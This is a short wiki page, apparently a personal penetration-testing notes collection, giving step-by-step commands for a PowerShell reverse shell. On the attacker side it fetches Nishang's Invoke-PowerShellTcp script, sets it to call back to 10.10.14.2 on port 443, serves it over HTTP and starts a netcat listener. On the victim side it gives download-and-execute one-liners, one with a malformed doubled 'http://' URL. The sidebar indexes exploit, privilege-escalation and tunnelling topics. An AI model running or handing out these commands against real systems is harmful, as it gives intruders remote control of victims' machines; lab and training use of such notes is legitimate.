Skip to content

Pơwershell reverse

lethanhtung01011980 edited this page Apr 22, 2020 · 4 revisions

Goals

Steps

In Attacker PC

  • wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
  • echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 443' >> Invoke-PowerShellTcp.ps1
  • python3 -m http.server 80
  • nc -nlvp 443

In victim PC, to download psl

  • Powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.2/Invoke-PowerShellTcp.ps1')
  • powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://http://10.10.14.2/Invoke-PowerShellTcp.ps1')"

Sidebar

0. COMMON exploits

1. Scan Info

1.2 Passive Gathering

1.3 Active Gathering

2. Pre-attack

2.2 File transfer

3. Get Reverse Shell

4. Exploits

4.2 Windows Exploits

4.3 Linux Exploits

4.4 Password crack

4.5 Buffer Overflow

4.6 Web attacks

6. Escalate Privilege

6.1 Escalate in Windows

6.2 Escalate in Linux

7. Access and further attacks

8. Port redirection and Tunnelling

9. Metasploit

10. Kali

11. Thirdparty scripts

Clone this wiki locally